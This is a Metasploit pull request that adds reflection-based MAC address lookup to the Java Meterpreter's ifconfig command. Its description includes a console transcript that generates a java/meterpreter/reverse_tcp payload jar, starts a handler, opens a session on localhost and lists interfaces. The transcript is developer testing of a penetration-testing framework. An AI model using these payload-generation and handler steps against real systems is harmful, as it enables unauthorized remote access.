### PR TITLE
add support for conditionally emitting MAC addresses

### DIFF
--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_interfaces_V1_4.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_net_config_get_interfaces_V1_4.java
@@ -1,6 +1,7 @@
 package com.metasploit.meterpreter.stdapi;
 
 import java.io.IOException;
+import java.lang.reflect.Method;
 import java.net.InetAddress;
 import java.net.NetworkInterface;
 import java.util.ArrayList;
@@ -48,6 +49,13 @@ public class stdapi_net_config_get_interfaces_V1_4 extends stdapi_net_config_get
     }
 
     protected byte[] getMacAddress(NetworkInterface iface) throws IOException {
+		try {
+			Method getMac = iface.getClass().getMethod("getHardwareAddress");
+			if (getMac != null) {
+				return (byte[]) getMac.invoke(iface);
+			}
+		} catch (Exception e) {
+		}
         return null;
     }
 


### PR DESCRIPTION
Currently, the ifconfig meterpreter command returns a null string for MAC addresses, since getHardwareAddress was not added to the NetworkInterface class until Java 1.6 (and at some point on Android). This adds a simple bit of introspection to check if getHardwareAddress exists before invoking it instead. I'm not 100% clear how the V1_4 / V1_6 files get used at runtime, but just running the Java payload as-is seemed to invoke the V1_4 version no matter the actual Java version being used.

# Verification steps
 - [ ] start a java meterpreter shell
 - [ ] ensure that the MAC address is returned with interfaces when running ifconfig
 - [ ] start an android meterpreter shell (TBD - haven't tried it here yet)
 - [ ] ensure that the MAC address is returned with interfaces when running ifconfig

Example output:
```
msf > setg LHOST 127.0.0.1
LHOST => 127.0.0.1
msf > use payload/java/meterpreter/reverse_tcp 
msf payload(reverse_tcp) > generate -f test.jar -t raw
WARNING: Local file /home/bcook/projects/metasploit-framework/data/java is being used
WARNING: Local files may be incompatible Metasploit framework
[*] Writing 5112 bytes to test.jar...
msf payload(reverse_tcp) > use exploit/multi/handler 
msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 127.0.0.1:4444 
msf exploit(handler) > [*] Starting the payload handler...
set payload java/meterp
msf exploit(handler) > java -jar test.jar
[*] exec: java -jar test.jar

WARNING: Local file /home/bcook/projects/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/bcook/projects/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/bcook/projects/metasploit-framework/data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class is being used
WARNING: Local file /home/bcook/projects/metasploit-framework/data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class is being used
WARNING: Local file /home/bcook/projects/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used

[*] Sending stage (45991 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36162) at 2016-02-03 05:35:09 -0600
WARNING: Local file /home/bcook/projects/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
msf exploit(handler) > 
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ifconfig

Interface  1
============
Name         : vboxnet0 - vboxnet0
Hardware MAC : 0a:00:27:00:00:00
MTU          : 1500
IPv4 Address : 192.168.56.1
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::800:27ff:fe00:0
IPv6 Netmask : ffff:ffff:ffff:ffff::
```